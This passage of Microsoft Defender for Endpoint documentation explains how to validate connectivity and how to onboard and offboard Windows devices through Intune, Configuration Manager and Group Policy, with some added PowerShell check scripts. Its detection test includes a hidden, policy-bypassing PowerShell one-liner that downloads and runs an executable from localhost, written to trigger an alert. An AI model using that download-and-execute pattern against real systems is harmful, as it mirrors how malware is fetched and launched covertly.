If you move the device back to the regular method, the value is "Standard".

For devices that have not yet attempted to reonboard, the value remains blank.

Tracking locally on a device through Windows Event Viewer
You can use Windows Event Viewer's SENSE operational log to locally validate
connections with the new streamlined approach. SENSE Event ID 4 tracks successful EDR
connections.

Open the Defender for Endpoint service event log using the following steps:

1. On the Windows menu, select Start, then type Event Viewer. Then select Event
Viewer.

2. In the log list, under Log Summary, scroll down until you see Microsoft-Windows-
SENSE/Operational. Double-click the item to open the log.
You can also access the log by expanding Applications and Services
Logs > Microsoft > Windows > SENSE and selecting Operational.

3. Event ID 4 tracks successful connections with the Defender for Endpoint Command &
Control channel. Verify successful connections with the updated URL. For example:

Contacted server 6 times, all succeeded, URI: <region>.<geo>.endpoint.security.microsoft.com.

<EventData>
<Data Name="UInt1">6</Data>
<Data Name="Message1">https://<region>.<geo>.endpoint.security.microsoft.com</Data>
</EventData>

4. Message1 contains the contacted URL. Confirm the event includes the streamlined
URL (endpoint.security.microsoft.com).

5. Event ID 5 tracks errors if applicable.

Note

SENSE is the internal name used to refer to the behavioral sensor that powers
Microsoft Defender for Endpoint.
Events recorded by the service will appear in the log.
For more information, see Review events and errors using Event Viewer.
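The Event Viewer steps above can be scripted when you have more than a handful of migrated devices to check. The following PowerShell is an added example, not code from the Microsoft article: it reads the same Microsoft-Windows-SENSE/Operational log, pulls Message1 out of each Event ID 4 payload, reports whether the contacted host matches the streamlined endpoint.security.microsoft.com pattern, and surfaces any Event ID 5 errors. It assumes an elevated PowerShell session on the device; the 200-event window and the output layout are choices made for the example.

```powershell
# Added example (not from the Microsoft article): read the SENSE operational log
# and check whether successful EDR connections (Event ID 4) went to the
# streamlined URL set. Event ID 5 entries (errors) are surfaced alongside.
# Run from an elevated PowerShell session on the migrated device.

$LogName           = 'Microsoft-Windows-SENSE/Operational'
$StreamlinedSuffix = '.endpoint.security.microsoft.com'
$MaxEvents         = 200   # assumption: enough history for a freshly reonboarded device

$events = Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 4, 5 } `
    -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
if (-not $events) {
    Write-Warning "No Event ID 4/5 entries in $LogName; the sensor has not attempted a connection since reonboarding."
    return
}

$results = foreach ($e in $events) {
    # Message1 in the event payload holds the contacted URL (see the event data
    # shown above); read it from the XML rather than the rendered message text.
    $xml      = [xml]$e.ToXml()
    $data     = @($xml.Event.EventData.Data)
    $message1 = ($data | Where-Object { $_.Name -eq 'Message1' } | Select-Object -First 1).'#text'

    # Message1 is normally a full URL; fall back to the raw string if it is a bare host.
    $uriHost = $null
    if ($message1) {
        try { $uriHost = ([uri]$message1).Host } catch { $uriHost = $message1 }
    }

    [pscustomobject]@{
        Time        = $e.TimeCreated
        Id          = $e.Id
        Host        = $uriHost
        Streamlined = [bool]($uriHost -and
                       $uriHost.EndsWith($StreamlinedSuffix, [System.StringComparison]::OrdinalIgnoreCase))
    }
}

$results | Sort-Object Time -Descending | Format-Table -AutoSize

$good     = @($results | Where-Object { $_.Id -eq 4 -and $_.Streamlined })
$failures = @($results | Where-Object { $_.Id -eq 5 })

if ($good.Count -gt 0) {
    Write-Host ("OK: {0} successful connection(s) to *{1}" -f $good.Count, $StreamlinedSuffix)
} else {
    Write-Warning "No Event ID 4 entry with a streamlined URL yet; the device may still be on the standard connectivity set."
}
if ($failures.Count -gt 0) {
    Write-Warning ("{0} Event ID 5 error(s) found; review them before migrating more devices." -f $failures.Count)
}
```

The script deliberately checks the host suffix rather than the full URL, because the region and geo labels in front of endpoint.security.microsoft.com differ per tenant; a device that still shows only standard hosts under Event ID 4 has not completed the switch and should be rebooted or reonboarded before the rollout widens.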

Run tests to confirm connectivity with Defender for Endpoint services
Once the device is onboarded to Defender for Endpoint, validate that it's continuing to
appear in Device Inventory. The DeviceID should remain the same.

Check the Device Page Timeline tab to confirm events are flowing from the device.

Live Response
Ensure Live Response is working on your test device. Follow instructions in Investigate
entities on devices using live response.

Make sure to run a couple of basic commands post-connection to confirm connectivity
(such as cd, jobs, connect).

Automated investigation and response
Ensure that Automated investigation and response is working on your test device:
Configure automated investigation and response capabilities.

For Auto-IR testing labs, navigate to Microsoft Defender XDR > Evaluations & Tutorials
> Tutorials & Simulations > Tutorials > Automated Investigation tutorials.

Cloud-delivered protection
1. Open a Command Prompt as an administrator.

2. Right-click the item in the Start menu, select Run as administrator then select Yes
at the permissions prompt.

3. Use the following argument with the Microsoft Defender Antivirus command-line
utility (mpcmdrun.exe) to verify that your network can communicate with the
Microsoft Defender Antivirus cloud service:
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection

Note

This command will only work on Windows 10, version 1703 or higher, or Windows
11. For more information, see Manage Microsoft Defender Antivirus with the
mpcmdrun.exe command-line tool.

Test Block at First Sight

Follow instructions in Microsoft Defender for Endpoint Block at First Sight (BAFS)
demonstration.

Test SmartScreen

Follow instructions in Microsoft Defender SmartScreen Demo (msft.net) .

PowerShell detection test

1. On the Windows device, create a folder: C:\test-MDATP-test.

2. Open Command Prompt as an administrator.

3. In the Command Prompt window, run the following PowerShell command:

PowerShell

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'

After the command runs, the Command Prompt window closes automatically. If
successful, the detection test is marked as completed.

For macOS and Linux, you can use the following methods:

MDATP connectivity tests
Tracking with advanced hunting in Microsoft Defender XDR
Run tests to confirm connectivity with Defender for Endpoint services

MDATP connectivity test (macOS and Linux)
Run mdatp health --details features to confirm simplified_connectivity: "enabled".

Run mdatp health --details edr to confirm edr_partner_geo_location is available. The
value should be GW_<geo> where 'geo' is your tenant's geo-location.

Run mdatp connectivity test. Ensure the streamlined URL pattern is present. You should
expect two for '/storage', one for '/mdav', one for '/xplat', and one for '/packages'.

For example: https://mdav.us.endpoint.security.microsoft.com/storage

Tracking with advanced hunting in Microsoft Defender XDR
Follow the same instructions as for Windows.

Use Defender for Endpoint Client Analyzer (cross-platform) to validate connectivity for newly migrated endpoints
Download and run the client analyzer for macOS or Linux. For more information, see
Download and run the client analyzer.

1. Run mdeclientanalyzer.cmd -o <path to cmd file> from within the
MDEClientAnalyzer folder. The command uses parameters from the onboarding
package to test connectivity.

2. Run mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU> (where the parameter is one of
GW_US, GW_EU, GW_UK). GW refers to the streamlined option. Run with the applicable
tenant geo.


Defender for Endpoint onboarding Windows Client
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Endpoint data loss prevention (DLP)
Insider risk management

Want to experience Defender for Endpoint? Sign up for a free trial.

You'll need to go through onboarding steps of the Defender for Endpoint portal to
onboard any of the supported devices. Depending on the device, you'll be guided with
appropriate steps and provided management and deployment tool options suitable for
the device.

Devices in your organization must be configured so that the Defender for Endpoint
service can get sensor data from them. There are various methods and deployment
tools that you can use to configure the devices in your organization.

In general, you'll identify the client you're onboarding, then follow the corresponding
tool appropriate to the device or your environment.

Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

Related topics
Onboard Windows devices using Microsoft Intune
Onboard Windows devices using Group Policy
Onboard Windows devices using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) devices

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Onboard Windows devices to Defender for Endpoint using Intune
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

You can use mobile device management (MDM) solutions to configure Windows 10
devices. Defender for Endpoint supports MDMs by providing OMA-URIs to create
policies to manage devices.

For more information on using the Defender for Endpoint CSP, see
WindowsAdvancedThreatProtection CSP and WindowsAdvancedThreatProtection DDF file.

Before you begin
Devices must be enrolled with Intune as your Mobile Device Management (MDM)
solution.

For more information on enabling MDM with Microsoft Intune, see Device enrollment
(Microsoft Intune).

Onboard devices using Microsoft Intune
Check out Identify Defender for Endpoint architecture and deployment method to see
the various paths in deploying Defender for Endpoint.

Follow the instructions from Intune.

Note

The Health Status for onboarded devices policy uses read-only properties
and can't be remediated.
Configuration of diagnostic data reporting frequency is only available for
devices on Windows 10, version 1703.
Onboarding to Defender for Endpoint will onboard the device to Data Loss
Prevention (DLP), which is also a part of Microsoft 365 compliance.

Run a detection test to verify onboarding
After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.

Offboard devices using Mobile Device Management tools
For security reasons, the package used to offboard devices will expire 30 days after the
date it was downloaded. Expired offboarding packages sent to a device will be rejected.
When downloading an offboarding package, you'll be notified of the package's expiry
date, and it will also be included in the package name.

Note

Onboarding and offboarding policies must not be deployed on the same device at
the same time, otherwise this will cause unpredictable collisions.

1. Get the offboarding package from Microsoft Defender portal :

a. In the navigation pane, select Settings > Endpoints > Device management >
Offboarding.

b. Select Windows 10 or Windows 11 as the operating system.

c. In the Deployment method field, select Mobile Device Management /
Microsoft Intune.

d. Click Download package, and save the .zip file.

2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the network administrators who will deploy the package. You should
have a file named WindowsDefenderATP_valid_until_YYYY-MM-DD.offboarding.

3. Use the Microsoft Intune custom configuration policy to deploy the following
supported OMA-URI settings.

OMA-URI:
./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/Offboarding
Data type: String
Value: [Copy and paste the value from the content of the
WindowsDefenderATP_valid_until_YYYY-MM-DD.offboarding file]

For more information on Microsoft Intune policy settings, see Windows 10 policy
settings in Microsoft Intune.

Note

The Health Status for offboarded devices policy uses read-only properties and
can't be remediated.

Important

Offboarding causes the device to stop sending sensor data to the portal, but data
from the device, including reference to any alerts it has had, will be retained for up
to 6 months.

Related topics
Onboard Windows devices using Group Policy
Onboard Windows devices using Microsoft Endpoint Configuration Manager
Onboard Windows devices using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) devices
Run a detection test on a newly onboarded Microsoft Defender for Endpoint
device
Troubleshoot Microsoft Defender for Endpoint onboarding issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Onboard Windows devices using Configuration Manager
Article • 12/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Configuration Manager current branch
System Center 2012 R2 Configuration Manager

Want to experience Defender for Endpoint? Sign up for a free trial.

Prerequisites
Endpoint Protection point site system role

Important

The Endpoint Protection point site system role is required so that antivirus and
attack surface reduction policies are properly deployed to the targeted endpoints.
Without this role, the endpoints in the device collection won't receive the
configured antivirus and attack surface reduction policies.

You can use Configuration Manager to onboard endpoints to the Microsoft Defender for
Endpoint service.

There are several options you can use to onboard devices using Configuration Manager:

Onboard devices using System Center Configuration Manager
Tenant attach

For Windows Server 2012 R2 and Windows Server 2016 - after completing the
onboarding steps, you'll need to Configure and update System Center Endpoint
Protection clients.

Note

Defender for Endpoint doesn't support onboarding during the Out-Of-Box
Experience (OOBE) phase. Make sure users complete OOBE after running Windows
installation or upgrading.

Note that it's possible to create a detection rule on a Configuration Manager
application to continuously check if a device has been onboarded. An application is
a different type of object than a package and program. If a device is not yet
onboarded (due to pending OOBE completion or any other reason), Configuration
Manager will retry to onboard the device until the rule detects the status change.

This behavior can be accomplished by creating a detection rule checking if the
"OnboardingState" registry value (of type REG_DWORD) = 1. This registry value is
located under "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat
Protection\Status". For more information, see Configure Detection Methods in
System Center 2012 R2 Configuration Manager.
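The same detection rule can be expressed as a script detection method, which is useful when the application also needs to check something the registry rule cannot. The following PowerShell is an added example, not code from the Microsoft article or from Configuration Manager itself: it reads the OnboardingState value named above and reports "installed" only when it equals 1, so Configuration Manager keeps re-evaluating the onboarding application on devices that have not yet finished OOBE. The registry path and value come from the article; the exit-code and STDOUT convention is the one Configuration Manager script detection methods use.

```powershell
# Added example (not from the Microsoft article): script detection method for a
# Configuration Manager application that runs the onboarding package.
# Configuration Manager convention: exit code 0 with text on STDOUT means
# "installed"; exit code 0 with no output means "not installed", so the
# deployment is evaluated again on the next cycle. Registry path and value
# are the ones the article names.

$StatusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
$ValueName = 'OnboardingState'

try {
    # -ErrorAction Stop turns a missing key or value into a catchable error.
    $state = (Get-ItemProperty -Path $StatusKey -Name $ValueName -ErrorAction Stop).$ValueName
} catch {
    # Not onboarded yet (for example, the device is still in OOBE): write nothing,
    # so Configuration Manager records "not detected" and retries later.
    exit 0
}

if ([int]$state -eq 1) {
    # Onboarded: any STDOUT text marks the application as detected.
    Write-Output "$ValueName = 1 (device onboarded)"
}
exit 0
```

Keep the script silent on every path except the detected one; a stray Write-Output in the catch block would report the application as installed on devices that never onboarded, and the retry loop the article describes would stop.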

Configure sample collection settings
For each device, you can set a configuration value to state whether samples can be
collected from the device when a request is made through Microsoft Defender XDR to
submit a file for deep analysis.

Note

These configuration settings are typically done through Configuration Manager.

You can set a compliance rule for configuration item in Configuration Manager to
change the sample share setting on a device.

This rule should be a remediating compliance rule configuration item that sets the value
of a registry key on targeted devices to make sure they're compliant.

The configuration is set through the following registry key entry:

text

Path: "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
Name: "AllowSampleCollection"
Value: 0 or 1

The key type is DWORD. Possible values are:

0: Doesn't allow sample sharing from this device
1: Allows sharing of all file types from this device

The default value in case the registry key doesn't exist is 1.

For more information about System Center Configuration Manager Compliance, see
Introduction to compliance settings in System Center 2012 R2 Configuration Manager.
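The remediating compliance rule described above can be built as a script-based configuration item with a discovery script and a remediation script. The following PowerShell is an added example, not code from the Microsoft article: the discovery function returns the effective setting (reporting 1 when the value is absent, matching the documented default), and the remediation function creates the policy key if needed and writes the DWORD. The key, value name and semantics come from the article; the desired value of 1 is an assumption for the example.

```powershell
# Added example (not from the Microsoft article): discovery and remediation
# scripts for a Configuration Manager configuration item that keeps
# AllowSampleCollection at the desired value. Key, value name and semantics
# (0 = no sample sharing, 1 = share all file types, missing = treated as 1)
# come from the article; $DesiredValue is an assumption for the example.

$PolicyKey    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
$ValueName    = 'AllowSampleCollection'
$DesiredValue = 1   # assumption: this organization allows sample submission

# ---- Discovery script -------------------------------------------------------
# Returns the effective setting. The configuration item's compliance rule
# compares this output with $DesiredValue. A missing key or value is reported
# as 1 because that is the documented default when the key does not exist.
function Get-SampleCollectionSetting {
    $item = Get-ItemProperty -Path $PolicyKey -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 1 }
    return [int]$item.$ValueName
}

# ---- Remediation script -----------------------------------------------------
# Runs only when discovery does not match the rule. Creates the policy key if
# it is absent and writes the value as REG_DWORD, which is the type the
# article specifies.
function Set-SampleCollectionSetting {
    param([ValidateSet(0, 1)][int]$Value = $DesiredValue)
    if (-not (Test-Path -Path $PolicyKey)) {
        New-Item -Path $PolicyKey -Force | Out-Null
    }
    New-ItemProperty -Path $PolicyKey -Name $ValueName -PropertyType DWord `
        -Value $Value -Force | Out-Null
}

# Discovery output (what the compliance rule evaluates):
Get-SampleCollectionSetting
```

In Configuration Manager the two functions go into separate script boxes of the configuration item; the discovery script's only output must be the integer, so keep any diagnostics on Write-Verbose rather than Write-Output. Setting the value to 0 through the same remediation function is the way to stop deep-analysis sample submission from devices that handle regulated data.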

Onboard Windows devices using Microsoft Configuration Manager

Collection creation
To onboard Windows devices with Microsoft Configuration Manager, the deployment
can target an existing collection or a new collection can be created for testing.

Onboarding using tools such as Group Policy or a manual method doesn't install any
agents on the system.

Within the Microsoft Configuration Manager console, the onboarding process will be
configured as part of the compliance settings within the console.

Any system that receives this required configuration maintains that configuration for as
long as the Configuration Manager client continues to receive this policy from the
management point.

Follow these steps to onboard endpoints using Microsoft Configuration Manager:

1. In the Microsoft Configuration Manager console, navigate to Assets and
Compliance > Overview > Device Collections.

2. Select and hold (or right-click) Device Collection and select Create Device
Collection.

3. Provide a Name and Limiting Collection, then select Next.

4. Select Add Rule and choose Query Rule.

5. Select Next on the Direct Membership Wizard and then select Edit Query
Statement.

6. Select Criteria and then choose the star icon.

7. Keep the criterion type as Simple value, choose Where as Operating System - build
number, operator as is greater than or equal to and value 14393, and select OK.

8. Select Next and Close.

9. Select Next.

After completing this task you have a device collection with all the Windows endpoints
in the environment.

Other recommended configuration settings
After onboarding devices to the service, it's important to take advantage of the included
threat protection capabilities by enabling them with the following recommended
configuration settings.

Device collection configuration
If you're using Configuration Manager, version 2002 or later, you can choose to broaden
the deployment to include servers or down-level clients.

Next generation protection configuration
The following configuration settings are recommended:

Scan
Scan removable storage devices such as USB drives: Yes

Real-time Protection
Enable Behavioral Monitoring: Yes
Enable protection against Potentially Unwanted Applications at download and
prior to installation: Yes

Cloud Protection Service
Cloud Protection Service membership type: Advanced membership

Attack surface reduction
Configure all available rules to Audit.

Note

Blocking these activities may interrupt legitimate business processes. The best
approach is setting everything to audit, identifying which ones are safe to turn on,
and then enabling those settings on endpoints which do not have false positive
detections.

For deploying Microsoft Defender Antivirus and attack surface reduction policies
through Microsoft Configuration Manager (SCCM), follow these steps:

Enable Endpoint Protection and configure custom client settings.
Install the Endpoint Protection client from a command prompt.
Verify the Endpoint Protection client installation.

Enable Endpoint Protection and configure custom client settings

Follow the steps to enable endpoint protection and configuration of custom client
settings:

1. In the Configuration Manager console, click Administration.

2. In the Administration workspace, click Client Settings.

3. On the Home tab, in the Create group, click Create Custom Client Device Settings.

4. In the Create Custom Client Device Settings dialog box, provide a name and a
description for the group of settings, and then select Endpoint Protection.

5. Configure the Endpoint Protection client settings that you require. For a full list of
Endpoint Protection client settings that you can configure, see the Endpoint
Protection section in About client settings.

Important

Install the Endpoint Protection site system role before you configure client
settings for Endpoint Protection.

6. Click OK to close the Create Custom Client Device Settings dialog box. The new
client settings are displayed in the Client Settings node of the Administration
workspace.

7. Next, deploy the custom client settings to a collection. Select the custom client
settings you want to deploy. In the Home tab, in the Client Settings group, click
Deploy.

8. In the Select Collection dialog box, choose the collection to which you want to
deploy the client settings and then click OK. The new deployment is shown in the
Deployments tab of the details pane.

Clients are configured with these settings when they next download client policy. For
more information, see Initiate policy retrieval for a Configuration Manager client.

Installation of Endpoint Protection client from a command prompt

Follow the steps to complete installation of endpoint protection client from the
command prompt.

1. Copy scepinstall.exe from the Client folder of the Configuration Manager
installation folder to the computer on which you want to install the Endpoint
Protection client software.

2. Open a command prompt as an administrator. Change directory to the folder with
the installer. Then run scepinstall.exe, adding any extra command-line properties
that you require:

Property    Description
/s          Run the installer silently
/q          Extract the setup files silently
/i          Run the installer normally
/policy     Specify an antimalware policy file to configure the client during installation
/sqmoptin   Opt in to the Microsoft Customer Experience Improvement Program (CEIP)

3. Follow the on-screen instructions to complete the client installation.

4. If you downloaded the latest update definition package, copy the package to the
client computer, and then double-click the definition package to install it.

Note

After the Endpoint Protection client install completes, the client automatically
performs a definition update check. If this update check succeeds, you don't
have to manually install the latest definition update package.

Example: install the client with an antimalware policy

scepinstall.exe /policy <full path>\<policy file>

Verify the Endpoint Protection client installation

After you install the Endpoint Protection client on your reference computer, verify that
the client is working correctly.

1. On the reference computer, open System Center Endpoint Protection from the
Windows notification area.
2. On the Home tab of the System Center Endpoint Protection dialog box, verify that
Real-time protection is set to On.
3. Verify that up to date is displayed for Virus and spyware definitions.
4. To make sure that your reference computer is ready for imaging, under Scan
options, select Full, and then click Scan now.

Network protection
Prior to enabling network protection in audit or block mode, ensure that you've installed
the antimalware platform update, which can be obtained from the support page .

Controlled folder access
Enable the feature in audit mode for at least 30 days. After this period, review detections
and create a list of applications that are allowed to write to protected directories.

For more information, see Evaluate controlled folder access.

Run a detection test to verify onboarding
After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.

Offboard devices using Configuration Manager
For security reasons, the package used to offboard devices will expire 30 days after the
date it was downloaded. Expired offboarding packages sent to a device will be rejected.
When downloading an offboarding package, you will be notified of the package's expiry
date, and it will also be included in the package name.

Note

Onboarding and offboarding policies must not be deployed on the same device at
the same time, otherwise this will cause unpredictable collisions.

Offboard devices using Microsoft Configuration Manager current branch
If you use Microsoft Configuration Manager current branch, see Create an offboarding
configuration file.

Offboard devices using System Center 2012 R2 Configuration Manager
1. Get the offboarding package from Microsoft Defender portal :
a. In the navigation pane, select Settings > Endpoints > Device management >
Offboarding.
b. Select Windows 10 or Windows 11 as the operating system.
c. In the Deployment method field, select System Center Configuration Manager
2012/2012 R2/1511/1602.
d. Select Download package, and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the network administrators who will deploy the package. You should
have a file named WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-
DD.cmd.

3. Deploy the package by following the steps in the Packages and Programs in
System Center 2012 R2 Configuration Manager article.

Choose a predefined device collection to deploy the package to.

Important

Offboarding causes the device to stop sending sensor data to the portal, but data
from the device, including reference to any alerts it has had, will be retained for up
to 6 months.

Monitor device configuration
If you're using Microsoft Configuration Manager current branch, use the built-in
Defender for Endpoint dashboard in the Configuration Manager console. For more
information, see Defender for Endpoint - Monitor.

If you're using System Center 2012 R2 Configuration Manager, monitoring consists of
two parts:

1. Confirming the configuration package has been correctly deployed and is running
(or has successfully run) on the devices in your network.

2. Checking that the devices are compliant with the Defender for Endpoint service
(this ensures the device can complete the onboarding process and can continue to
report data to the service).

Confirm the configuration package has been correctly deployed
1. In the Configuration Manager console, click Monitoring at the bottom of the
navigation pane.

2. Select Overview and then Deployments.

3. Select the deployment with the package name.

4. Review the status indicators under Completion Statistics and Content Status.

If there are failed deployments (devices with Error, Requirements Not Met, or
Failed statuses), you may need to troubleshoot the devices. For more information,
see, Troubleshoot Microsoft Defender for Endpoint onboarding issues.

Check that the devices are compliant with the Microsoft Defender for Endpoint service
You can set a compliance rule for configuration item in System Center 2012 R2
Configuration Manager to monitor your deployment.

This rule should be a non-remediating compliance rule configuration item that monitors
the value of a registry key on targeted devices.

Monitor the following registry key entry:

Console

Path: "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"
Name: "OnboardingState"
Value: "1"

For more information, see Introduction to compliance settings in System Center 2012 R2
Configuration Manager.

Related topics
Onboard Windows devices using Group Policy
Onboard Windows devices using Mobile Device Management tools
Onboard Windows devices using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) devices
Run a detection test on a newly onboarded Microsoft Defender for Endpoint
device
Troubleshoot Microsoft Defender for Endpoint onboarding issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Onboard Windows devices using Group Policy
Article • 09/15/2023

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Applies to:

Group Policy
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

To use Group Policy (GP) updates to deploy the package, you must be on Windows
Server 2008 R2 or later.

For Windows Server 2019 and Windows Server 2022, you may need to replace NT
AUTHORITY\Well-Known-System-Account with NT AUTHORITY\SYSTEM in the XML
file that the Group Policy preference creates.

Note

If you're using the new, unified Microsoft Defender for Endpoint solution for
Windows Server 2012 R2 and 2016, please ensure you are using the latest ADMX
files in your central store to get access to the correct Microsoft Defender for
Endpoint policy options. Please reference How to create and manage the Central
Store for Group Policy Administrative Templates in Windows and download the
latest files for use with Windows 10.

Check out Identify Defender for Endpoint architecture and deployment method to see
the various paths in deploying Defender for Endpoint.

1. Open the GP configuration package file (WindowsDefenderATPOnboardingPackage.zip)
that you downloaded from the service onboarding wizard. You can also get the
package from the Microsoft Defender portal:

a. In the navigation pane, select Settings > Endpoints > Device management >
Onboarding.

b. Select the operating system.

c. In the Deployment method field, select Group policy.

d. Click Download package and save the .zip file.

2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the device. You should have a folder called OptionalParamsPolicy and
the file WindowsDefenderATPOnboardingScript.cmd.

3. To create a new GPO, open the Group Policy Management Console (GPMC), right-
click Group Policy Objects you want to configure and click New. Enter the name of
the new GPO in the dialogue box that is displayed and click OK.

4. Open the Group Policy Management Console (GPMC), right-click the Group Policy
Object (GPO) you want to configure and click Edit.

5. In the Group Policy Management Editor, go to Computer configuration, then
Preferences, and then Control panel settings.

6. Right-click Scheduled tasks, point to New, and then click Immediate Task (At least
Windows 7).

7. In the Task window that opens, go to the General tab. Under Security options click
Change User or Group and type SYSTEM and then click Check Names then OK. NT
AUTHORITY\SYSTEM appears as the user account the task will run as.

8. Select Run whether user is logged on or not and check the Run with highest
privileges check box.

9. In the Name field, type an appropriate name for the scheduled task (for example,
Defender for Endpoint Deployment).

10. Go to the Actions tab and select New... Ensure that Start a program is selected in
the Action field. Enter the UNC path, using the file server's fully qualified domain
name (FQDN), of the shared WindowsDefenderATPOnboardingScript.cmd file.

11. Select OK and close any open GPMC windows.

12. To link the GPO to an Organization Unit (OU), right-click and select Link an
existing GPO. In the dialogue box that is displayed, select the Group Policy Object
that you wish to link. Click OK.
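
To confirm on an individual device that the immediate task delivered by the GPO actually
ran and that the sensor is onboarded, the following PowerShell script is an added example
(it is not part of this article or of the onboarding package). It assumes the task name
typed in step 9. The Sense service is the sensor the article later queries with
sc query sense; the OnboardingState value under the Windows Advanced Threat Protection
Status key is not described on this page and is used here as an assumed onboarding
indicator (1 = onboarded).

```powershell
# Added example (not from the Microsoft article): verify a GPO-based onboarding on
# one endpoint. Run from an elevated PowerShell prompt.
param(
    [string]$TaskName = 'Defender for Endpoint Deployment'   # task name from step 9 (assumed)
)

# Assumed location of the sensor's onboarding indicator (not listed on this page).
$statusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
$result = [ordered]@{}

# 1. Did the immediate task created by Group Policy preferences exist and run?
#    Immediate tasks normally remove themselves after running, so "not present"
#    on its own is not a failure.
$task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
if ($task) {
    $info = $task | Get-ScheduledTaskInfo
    $result['TaskLastRun']    = $info.LastRunTime
    $result['TaskLastResult'] = $info.LastTaskResult   # 0 = the .cmd exited successfully
} else {
    $result['TaskLastRun'] = 'task not present (immediate tasks are removed once they have run)'
}

# 2. Is the Sense service (the EDR sensor) running? Same check as "sc query sense".
$sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
$result['SenseStatus'] = if ($sense) { $sense.Status } else { 'service not installed' }

# 3. Does the sensor report itself as onboarded?
$state = (Get-ItemProperty -Path $statusKey -Name OnboardingState -ErrorAction SilentlyContinue).OnboardingState
$result['OnboardingState'] = if ($null -eq $state) { 'missing' } else { $state }

[pscustomobject]$result | Format-List

if ($sense -and $sense.Status -eq 'Running' -and $state -eq 1) {
    Write-Host 'Device appears onboarded; run the detection test from the portal to confirm end to end.'
} else {
    Write-Warning 'Onboarding not confirmed. Check that the GPO applied (gpresult /r), that the UNC path to the .cmd resolves from this device, and see the troubleshooting article.'
}
```

The script reads state only; it does not change anything on the device, so it is safe to run repeatedly while waiting for Group Policy to refresh.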

Tip

After onboarding the device, you can choose to run a detection test to verify that
the device is properly onboarded to the service. For more information, see Run a
detection test on a newly onboarded Defender for Endpoint device.

Additional Defender for Endpoint configuration settings

For each device, you can state whether samples can be collected from the device when a
request is made through Microsoft Defender XDR to submit a file for deep analysis.

You can use Group Policy (GP) to configure settings, such as settings for the sample
sharing used in the deep analysis feature.

Configure sample collection settings


1. On your GP management device, copy the following files from the configuration
package:

Copy AtpConfiguration.admx into C:\Windows\PolicyDefinitions

Copy AtpConfiguration.adml into C:\Windows\PolicyDefinitions\en-US

If you're using a Central Store for Group Policy Administrative Templates, copy
the following files from the configuration package:

Copy AtpConfiguration.admx into \\<forest.root>\SysVol\<forest.root>\Policies\PolicyDefinitions

Copy AtpConfiguration.adml into \\<forest.root>\SysVol\<forest.root>\Policies\PolicyDefinitions\en-US

2. Open the Group Policy Management Console, right-click the GPO you want to
configure and click Edit.

3. In the Group Policy Management Editor, go to Computer configuration.

4. Click Policies, then Administrative templates.

5. Click Windows components and then Windows Defender ATP.

6. Choose to enable or disable sample sharing from your devices.

Note

If you don't set a value, the default value is to enable sample collection.

Other recommended configuration settings

Update endpoint protection configuration


After configuring the onboarding script, continue editing the same group policy to add
endpoint protection configurations. Perform group policy edits from a system running
Windows 10 or Server 2019, Windows 11, or Windows Server 2022 to ensure you have
all of the required Microsoft Defender Antivirus capabilities. You may need to close and
reopen the group policy object to register the Defender ATP configuration settings.

All policies are located under Computer Configuration\Policies\Administrative
Templates.

Policy location: \Windows Components\Windows Defender ATP

Policy                                  Setting
Enable\Disable Sample collection        Enabled - "Enable sample collection on machines" checked

Policy location: \Windows Components\Microsoft Defender Antivirus

Policy                                                      Setting
Configure detection for potentially unwanted applications   Enabled, Block

Policy location: \Windows Components\Microsoft Defender Antivirus\MAPS

Policy                                                  Setting
Join Microsoft MAPS                                     Enabled, Advanced MAPS
Send file samples when further analysis is required     Enabled, Send safe samples

Policy location: \Windows Components\Microsoft Defender Antivirus\Real-time Protection

Policy                                                  Setting
